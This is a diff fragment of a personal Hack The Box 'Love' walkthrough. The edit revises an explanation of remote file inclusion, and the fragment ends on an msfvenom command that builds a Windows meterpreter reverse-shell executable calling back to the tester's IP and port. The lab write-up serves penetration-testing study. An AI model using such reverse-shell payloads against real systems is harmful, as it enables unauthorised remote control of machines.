jsom1/jsom1.github.io/_walkthroughs/Love.md

 ![upload]({{https://jsom1.github.io/}}/_images/htb_love_upload.png)
 </div>

 I'm not sure about what it does exactly...
 Does it execute it?
 If it does, we could easily get a reverse shell...
-Being able to upload remote files on a server is called a **RFI** (remote file inclusion) vulnerability.
-Let's upload someething simpler to understand how it works.
+Being able to upload remote files into an application's running code is known as a **RFI** (remote file inclusion) vulnerability.
+This kind of vulnerability is commonly found in PHP applications.
+In order to exploit such a vulnerability, we must be able to not only execute code, but also to write our shell payload somewhere.
+Usually we can't simpy upload a file like here, but I won't explain how it works in other situations here. \\
+Instead, let's upload something simpler to understand how it works.
 Atfter many tries, I used *msfvenom* to create a reverse shell with the following syntax:

 ````
 sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=4444 -f exe > test.exe